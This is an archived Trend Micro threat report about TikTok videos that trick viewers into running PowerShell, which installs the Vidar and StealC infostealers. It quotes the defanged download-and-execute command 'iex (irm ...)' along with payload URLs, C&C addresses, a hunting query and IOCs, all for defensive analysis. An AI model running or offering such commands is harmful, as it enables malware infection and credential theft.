{
	"id": "e8934bdd-80ca-4221-9827-0cfd75e89242",
	"created_at": "2026-04-06T00:19:16.492451Z",
	"updated_at": "2026-04-10T13:12:05.852411Z",
	"deleted_at": null,
	"sha1_hash": "865a343ac1dbbd8187d00ab55893ff7ffb38fb70",
	"title": "TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers Instead",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1216550,
	"plain_text": "TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC\r\nInfostealers Instead\r\nBy Junestherry Dela Cruz ( words)\r\nPublished: 2025-05-21 · Archived: 2026-04-05 23:19:21 UTC\r\nMalware\r\nTrend™ Research uncovered a campaign on TikTok that uses videos to lure victims into downloading information\r\nstealers, a tactic that can be automated using AI tools.\r\nBy: Junestherry Dela Cruz May 21, 2025 Read time: 6 min (1619 words)\r\nSave to Folio\r\nSummary:\r\nTrend Research uncovered a new social engineering campaign using TikTok to deliver the Vidar and\r\nStealC information stealers. This attack uses videos (possibly AI-generated) to instruct users to execute\r\nPowerShell commands, which are disguised as software activation steps.\r\nTikTok’s algorithmic reach increases the likelihood of widespread exposure, with one video reaching more\r\nthan half a million views. Businesses can be affected by data exfiltration, credential theft, and potential\r\ncompromise of sensitive systems as a result of this threat.\r\nReinforcing security awareness, especially against AI-generated content, is crucial. Monitoring for unusual\r\ncommand execution involving PowerShell or other system utilities also helps identify malicious activity\r\nearly.\r\nTrend Vision One™ detects and blocks the IOCs discussed in this blog. Trend Vision One customers can\r\nalso access hunting queries, threat insights, and threat intelligence reports to gain rich context and the latest\r\nupdates on this campaign.\r\nTrend Research has uncovered a novel social engineering campaign using TikTok’s vast user base to distribute\r\ninformation-stealing malware, specifically Vidar and StealC. Unlike the prevalent Fake CAPTCHA campaign —\r\nwhich relies on fake CAPTCHA pages and clipboard hijacking to trick users into running malicious scripts — this\r\nnew campaign pivots to exploiting the popularity and viral nature of TikTok.\r\nThreat actors are now using TikTok videos that are potentially generated using AI-powered tools to socially\r\nengineer users into executing PowerShell commands under the guise of guiding them to activate legitimate\r\nsoftware or unlock premium features. This campaign highlights how attackers are ready to weaponize whichever\r\nsocial media platforms are currently popular to distribute malware.\r\nThis report details the observed tactics, techniques, and procedures (TTPs), indicators of compromise (IoCs), and\r\nthe potential impact of this trend.\r\nhttps://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html\r\nPage 1 of 7\n\nGoing where the users are: social media-driven deception\r\nThreat actors have long used social media platforms for their attacks, and TikTok is no different. Previous\r\ncampaigns used websites where malicious activity could be identified through the presence of injected JavaScript\r\non compromised landing pages; this TikTok-based campaign used social engineering entirely within video\r\ncontent.\r\nThe vast user base and algorithmic reach of social media platforms provide an ideal delivery mechanism for threat\r\nactors. For attackers, this means broad distribution without the logistical burden of maintaining an infrastructure.\r\nThe use of AI-generated content also elevates these kinds of attacks from isolated incidents to a highly scalable\r\noperation, as these videos can be rapidly produced and tailored to target different user segments.\r\nThe use of PowerShell from a technical utility to a social engineering tool is also notable. In this campaign,\r\nattackers are using TikTok videos to verbally instruct users into executing malicious commands on their own\r\nsystems. The social engineering occurs within the video itself, rather than through detectable code or scripts.\r\nThere is no malicious code present on the platform for security solutions to analyze or block. All actionable\r\ncontent is delivered visually and aurally. Threat actors do this to attempt to evade existing detection mechanisms,\r\nmaking it harder for defenders to detect and disrupt these campaigns.\r\nInitial vector\r\nWe initially identified a TikTok user, @gitallowed, who posted multiple faceless, potentially AI-generated videos.\r\nSince then, we have uncovered additional accounts engaging in similar activity, including @zane.houghton,\r\n@allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. These accounts are no longer active.\r\nThe videos instruct viewers to run a sequence of commands to purportedly activate legitimate software, such as\r\nWindows OS, Microsoft Office, CapCut, and Spotify. The videos are highly similar, with only minor differences\r\nin camera angles and the download URLs used by PowerShell to fetch the payload. These suggest that the videos\r\nwere likely created through automation. The instructional voice also appears AI-generated, reinforcing the\r\nlikelihood that AI tools are being used to produce these videos.\r\nTo better illustrate the scope and presentation of this campaign, Figure 1 shows the profile page of the TikTok\r\naccount used by the threat actor:\r\nhttps://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html\r\nPage 2 of 7\n\nOne particular video, which instructs viewers to run a PowerShell command, has attracted over 20,000 likes and\r\nmore than 100 comments — clear indicators of high user interaction and trust. While the exact view count is not\r\nvisible in the screenshot, TikTok’s analytics reveal that this video has reached nearly 500,000 views. Figure 2\r\ncaptures the video’s popularity and engagement metrics. The significant engagement with this video highlights its\r\nreach and the likelihood that many viewers might have followed the instructions.\r\nIn the video, the threat actor presents a series of simple, step-by-step instructions, making the malicious process\r\nappear both legitimate and easy to follow:\r\n1. Press  Windows + R\r\n2. Type powershell and press Enter\r\n3. Execute the following command:\r\nhttps://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html\r\nPage 3 of 7\n\niex (irm hxxps://allaivo[.]me/spotify)\r\nThese instructions are designed to socially engineer viewers into running a PowerShell command that downloads\r\nand executes a remote script, ultimately compromising their system.\r\nMalicious chain of execution\r\nThe PowerShell command downloads and executes a script (SHA256:\r\nb8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) from hxxps://allaivo[.]me/spotify.\r\nThe attack chain involves the following:\r\n1. Upon execution, the script first creates hidden directories within the user’s APPDATA and\r\nLOCALAPPDATA folders, adding these locations to the Windows Defender exclusion list to evade\r\ndetection.\r\n2. It then retrieves a secondary payload from hxxps://amssh[.]co/file.exe, which has been identified as either\r\nVidar or StealC malware, and saves it in the hidden folder.\r\n3. The script employs the retry logic to ensure that the payload is downloaded successfully, and then launches\r\nthe malware executable as a hidden, elevated process.\r\n4. If the previous process completes successfully, the script downloads an additional PowerShell script from\r\nhxxps://amssh[.]co/script[.]ps1, saves it in the hidden directory, and sets up persistence by creating a\r\nregistry key to execute the script at startup.\r\n5. The script deletes temporary folders to minimize forensic traces, while robust error handling ensures the\r\ninfection chain proceeds smoothly.\r\nCommand-and-control infrastructure\r\nThe downloaded Vidar and StealC malware will then reach out to their command-and-control (C\u0026C) servers:\r\nhttps://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html\r\nPage 4 of 7\n\nhxxps://steamcommunity[.]com/profiles/76561199846773220 (Vidar)\r\nhxxps://t[.]me/v00rd (Vidar) \r\nhxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php (StealC)\r\nVidar, in particular, abuses legitimate services like Steam and Telegram to serve as Dead Drop Resolvers (DDR)\r\n for its C\u0026C server information to conceal them. The Steam profile below, for example, contains the actual C\u0026C\r\nIP address in its contents:\r\n Figure 5 summarizes the infection chain of this campaign:\r\nSecurity implications for users and businesses\r\nThe shift to social media as a delivery mechanism for malware requires a corresponding reassessment in defense\r\nstrategies. Traditional security controls that focus on malicious code detection, link scanning, and domain\r\nhttps://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html\r\nPage 5 of 7\n\nreputation are less effective against attacks that exploit user trust and obscure malicious intent. Security strategies\r\nmust adopt a more holistic approach that includes social media monitoring, behavioral analysis, and targeted user\r\neducation. Addressing these attack vectors proactively will reduce the risk of mass compromise and help users and\r\nbusinesses alike:\r\nExpanding threat monitoring to social media platforms: Integrating social media threat intelligence feeds can\r\nhelp businesses track emerging campaigns and identify high-engagement content linked to unusual or technical\r\ninstructions. Since threat actors often reuse content across multiple platforms, correlating posts across social\r\nmedia networks can reveal interconnected campaigns and even emerging threats.\r\nIncorporating behavioral analysis: With no malicious code embedded, detecting malicious actions relies on\r\nmonitoring user behavior. This includes identifying anomalous activities, such as the execution of system utilities\r\nlike PowerShell. Red flags also include unexpected command execution, direct downloads from unknown URLs,\r\nunauthorized creation of folders, or modifications in security settings.\r\nStrengthening social engineering awareness: Employee training must evolve beyond phishing to address tactics\r\nthat exploit visual and auditory content on social media. Users should be encouraged to scrutinize unsolicited\r\ntechnical instructions, verify the legitimacy of video sources, and report suspicious content, whether on social\r\nmedia, messaging apps, or email. After all, if an offer seems too good to be true, it probably is.\r\nProactive security with Trend Vision One™\r\nTrend Vision Oneone-platform™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber\r\nrisk exposure management, security operations, and robust layered protection. This comprehensive approach helps\r\nyou predict and prevent threats, accelerating proactive security outcomes across your entire digital estate. Backed\r\nby decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it\r\ndelivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security\r\nleaders can benchmark their posture and showcase continuous improvement to stakeholders. With Trend Vision\r\nOne, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a\r\nstrategic partner for innovation.\r\nTrend Micro™ Threat Intelligence\r\nTo stay ahead of evolving threats, Trend customers can access Trend Vision One™ Threat Insights, which\r\nprovides the latest insights from Trend Research on emerging threats and threat actors.\r\nTrend Vision One Threat Insights\r\nEmerging Threats: Weaponizing TikTok – AI-Generated Videos Deliver Infostealers at Scale\r\nTrend Vision One Intelligence Reports (IOC Sweeping) \r\nEmerging Social Engineering Campaigns Abusing TikTok for Malware Delivery (Vidar, StealC)\r\nHunting Queries \r\nhttps://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html\r\nPage 6 of 7\n\nTrend Vision One Search App \r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this\r\nblog post with data in their environment.    \r\nExecution of powershell command to download StealC/Vidar\r\neventSubId: 901 and objectRawDataStr:\"iex (irm https://\"\r\nMore hunting queries are available for Trend Vision One customers with Threat Insights Entitlement\r\nenabledproducts. \r\nIndicators of Compromise (IOCs)\r\nFile Hash: 3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9b\r\nFile Hash: afc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5\r\nFile Hash: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886\r\nURL: hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php\r\nURL: hxxps://allaivo[.]me/spotify\r\nURL: hxxps://amssh[.]co/file[.]exe\r\nURL: hxxps://amssh[.]co/script[.]ps1\r\nURL: hxxps://steamcommunity[.]com/profiles/76561199846773220\r\nURL: hxxps://t[.]me/v00rd\r\nIP: hxxps://49[.]12[.]113[.]201\r\nIP: hxxps://116[.]202[.]6[.]216\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html\r\nhttps://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html"
	],
	"report_names": [
		"tiktok-videos-infostealers.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434756,
	"ts_updated_at": 1775826725,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/865a343ac1dbbd8187d00ab55893ff7ffb38fb70.pdf",
		"text": "https://archive.orkl.eu/865a343ac1dbbd8187d00ab55893ff7ffb38fb70.txt",
		"img": "https://archive.orkl.eu/865a343ac1dbbd8187d00ab55893ff7ffb38fb70.jpg"
	}
}